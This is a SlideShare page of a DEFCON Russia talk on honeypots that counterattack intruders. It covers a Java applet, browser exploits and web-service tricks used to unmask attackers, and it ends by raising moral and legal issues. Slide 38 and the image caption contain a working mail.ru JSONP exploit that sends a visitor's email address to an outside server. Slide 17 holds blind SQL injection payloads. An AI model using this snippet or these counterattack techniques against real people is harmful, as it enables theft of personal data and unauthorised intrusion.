Phd final
0 likes1,014 views
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it was able to exploit browsers or third party services to gather additional data like email addresses. However, more skilled attackers avoided running untrusted software. The document concludes honeypots can provide useful intelligence but also raises moral and legal issues with counterattacking or exploiting attackers.
![document.write("<iframe src='data:text/html,<html><body>
<script>var sss = document.createElement("script");
sss.src=“
http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612
";
function PortalHeadlineJSONPCallback(objFromMail){
var arr1=objFromMail["data"];
var i = new Image();
i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"];
document.body.appendChild(i);
};
document.body.appendChild(sss);
</script>
</body></html>'>");
#mail.ru exploit](https://image.slidesharecdn.com/phdfinal-130605081305-phpapp01/85/Phd-final-38-320.jpg)
Phd final
- 1. Alexey Sintsov @asintsov DEFCON RUSSIA DC#7812 HONEYPOT THAT CAN BITE: REVERSE PENETRATION
- 2. #WHOAMI • Senior Security Engineer at • Writer at • Ideology and co-organizer of • Co-Founder of ZeroNights
- 3. #DISCLAIMER • This story is not connected to my EMPLOYER • All LIVE data was got from Q2 2011 – Q3 2012 • It was done only for research purposes. • All data was shared with NOBODY. • Thx to Alexey Tyurin (@antyurin)
- 4. #WHAT IS IT ABOUT honeypot • Attract attacker‟s attention (to HoneyPot) • Get patterns and actions from an attacker behavior Then Operator can understand what kind of attacker we have, what he can do in the future and etc. After that we can Take some „preventative‟ actions. Example 1. Bot search for PHP LFI bug in PMA Def. actions: 1) Do we have PMA? 2) Are our PMA installation accessible from the Internet? 3) Bug fixed? // but the same we can get from IDS… Example 2. SQLi attempt. Dumping hashes. Def. actions: 1) What kind of SQLi he tried to exploit – let‟s check our web-apps for same SQLi patterns 2) Check hashes in our databases – is it salted? Do we have hashes at all? (or plain text?) 3) Check access to tables , is it possible to get access by using „web‟ account?
- 5. #WHAT IS IT ABOUT classic… IDS Alert SQLi attempt in some .php Is it vulnerable? What attacker did? Log/traffic analysis Src analysis/ manual validation Who is the attacker? - Was he looking for something special? - Is he going to comeback? - How we should be prepared? Deploy the Incident Response Team © InfoSecReactions By @windsheep_
- 7. #WHOIS THE ATTACKER Why? I do not care, main task – fix the bug! vs. It‟s interesting, I want to track him!
- 8. #WHOIS THE ATTACKER Who wants to know… • Enterprise - Who is hunting us like that? (oil‟s sector/big R&D) It is always good to know who has started this activity…. Because if it is just kids, it is one thing, if government or competitors – another thing. • Government - Track cybercrimes - Track another government… cyber war, blah-blah-blah… - etc …
- 9. #WHOIS THE ATTACKER IDS/Logs • IP address - TOR/(chain of)Proxy/BOTnet • User-Agent - lol We have sniffed got nothing…..
- 10. #HONEYPOT What I want? • Fast result: attack or false positive? • Is it a targeted attack? Or just a scan from botnet? • Is it a professional or kiddie • Decloaking the attacker • Track the attacker
- 11. #Offensive “The only real defence is active defence“ © Mao Zedong • Hack your enemy first (aggressive) • Hack your enemy back (defensive)
- 12. #Offensive Not new… AV/Security companies - to take down botnet: • Hacking C&C • Hacking chain of BOTs • Hacking Admin‟s workstation © Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
- 13. #Offensive We can do more… “Replay back” – answer with the same exploit back to the source: • SSH Brute force attack - if the source has SSH service - replay with the same login/pass -- attacker has already changed password on pwned box • PHP/Perl/Ruby web attacks - if the source has HTTP service - replay back with same URI/payload It is against BOTs, and will not work against real attacker.
- 14. #Offensive WWW • Is it (the attacker) HUMAN? • Is he using well-know application (browser/plugins)? • Can we EXPLOIT it? Classical ExploitPACK?
- 15. #Honeypot Skills? Bug Vulnerability Exploit Attack Can be found automatically SHOULD be found during manual tests SHOULD be executed by the attacker with browser! Attacker’s level of skills • Low • Medium • High! • Dangerous, we are doomed!!!11
- 16. #Honeypot Trap • DIRBuster attack, give them /admin/admin.php But what is the password? // We can detect bruteforce attacks… • /admin/help.php?id=1 <--SQL Injection Get password for admin.php • Login with stolen password to /admin/admin.php • Attack complete!
- 17. #Honeypot Blind SQL Injection (SQLite) „ - 500 Error. This is a bug „/**/AND/**/ „1‟ /**/like„1‟-- - 200. This is a vulnerability „union/**/select(CASE/**/WHEN/**/ sqlite_version()like'3.%'THEN/**/ select(1)from(lololo)ELSE‟BHEU13‟ END) - 200/500. This is an exploit Skill-O-Meter Additional to Skill-O-Metr • Filtered Symbols, like „space‟ • WAF with small „holes‟ • etc, like CTF tasks or hackquest…
- 19. #Honeypot …can bite! • For each step we can get: o Human/automated attack (Skill-O-Meter) o The malicious intention of an attacker WhiteHat will finish after finding a SQLi vulnerability. He will not attempt to get access to forbidden part (admin.php)! Ok, ok… even if he got access to admin.php he do not try to get „secret.pdf‟ =) • On each step we can bite… o On „attack step‟ we can counterattack…
- 20. #Counterattack What we can? • Attack his browser/plugins • 1day/0day exploits • Social engineering • Evil Java applet/ActiveX (GUI for administration…) • Honeytokens • Attack his env. using a browser. • Third party services (web-mail/social networks/etc) • Local env. (localhost/dsl-router)
- 21. #Social Engineering Honeytokens • PDF file with secret information (and with exploit…) • EXE file with secret application (fat client for SCADA…) • etc….
- 22. #Backdoor… ? No – “detective” • Get jpg/txt/doc files from FS • Get config files (VPN) • Get BSSIDs • Get network/domain configuration • Get traceroute to us • Get DNS to us • Get camera-shot, mic recording • etc…
- 24. #Target • Reverse DNS channel • ipconfig • tracert • Domain name • Login name • … • DO NOT COLLECT PERSONAL INFO • DO NOT GET ANY DATA FROM HDD • REMOTE CONTROL DISABLED
- 25. #Results GET requests log It can be WEB proxy or TOR exit point… Data from attacker’s PC
- 26. #Results Real logins – second names Real host-names and domains Real ISP, IP addresses
- 27. #Results Write-up about First DCG meeting in Russia… habrahabr.ru Most technical Russian IT community… Comments…“ If someone wants invite: ‘ or 1=1– “
- 28. #Hello “Red May” 2011 GET requests log No success with SE or reverse penetration… I am lucky…
- 29. #Unexpected GET requests log One beautiful Ex-USSR republic… Nothing special… Damn! Special-Super-Secret-Service of beautiful ex-USSR republic… Looks like „service‟ username, not personal… may be it was compromised?
- 30. #More drama … few hours latter, another intrusion to DCG web-site … from same ex-USSR republic, same city…. … but another subnet … and again – “reverse penetration” Known nickname, you can Google him as know hacker form this ex-USSR republic.. may be he is working for this Secret Service … or compromise this host and use as intermediate…
- 31. #Results • Whitehat‟s companies – have tested our Applet! • Independent whitehat researchers… • Backdoored government WS…. • Script kiddies…
- 32. #Conclusion It works! • We got real usernames of those who did not use VMware/and middle hosts • We got real source for those who use VMware/TOR/Proxy and did not use middle hosts • We got intermediate hosts, but we can detect it, end got • We got configured DNS server address • And we got it automatically… The same results possible for honey token/exploit-back techniques… SE: Attacker is not expecting back-attack!
- 33. #But Some attackers are careful //@ahack_ru had known about Honeypot and Java applet and did not run it… but he was busted anyway!
- 34. #Can we attack 3rd party services? If user is authenticated on others services HoneyPot Attacker SocialNetwork • Attack begins • CSRF/XSS attack… • Callback with ID…. • Proxy/TOR/VPN – it is not about network! • Works only vs. script-kiddies and whitehats
- 35. #Linkedin
- 36. #Yandex JSONP
- 37. #mail.ru JSONP Hack 1: SSL Hack 2: <iframe src=“data:… By Egor Homakov
- 38. document.write("<iframe src='data:text/html,<html><body> <script>var sss = document.createElement("script"); sss.src=“ http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612 "; function PortalHeadlineJSONPCallback(objFromMail){ var arr1=objFromMail["data"]; var i = new Image(); i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"]; document.body.appendChild(i); }; document.body.appendChild(sss); </script> </body></html>'>"); #mail.ru exploit
- 40. #Results
- 41. #Conclusion It works! • We got real emails • We got real names • We can do correlation between two e-mail addresses and Java Applet response • And we got it automatically…
- 42. #Conclusion Stats! • SQLi attacks - 484 (~1.2 years) • Applet strikes - 52 (~1.2 years) • Mail grabs - 16 (6 month) ~ 17% success
- 43. #Conclusion Public announcements of DC Rus First meeting Second meeting Sixth meeting announcement, pre-Zeronights era
- 45. #Moarrrrrrrrr Local env. can be attacked! • Anti DNS pinning / DNS rebinding • XXXSS by Samy Kamkar (Getting BSSIDs…) • CSRF/XSS on any local resources…. • There can be million techniques and tricks for that…
- 46. #SE – Custom software Anti-Cybercrime Login Detect fraud/hack attempt Classic ActiveX/Java Backdoored ActiveX/Java Work… Error/ Meintance
- 47. #SE – Custom software Government level • SCADA • Army systems • FSB/KGB/CIA/MI6/… • etc..
- 48. #SE – Custom software Наши поделки?
- 49. #Conclusion • Counterattack can work… • Whitehats are LESS carful when testing something… • ???? • Moral/Legal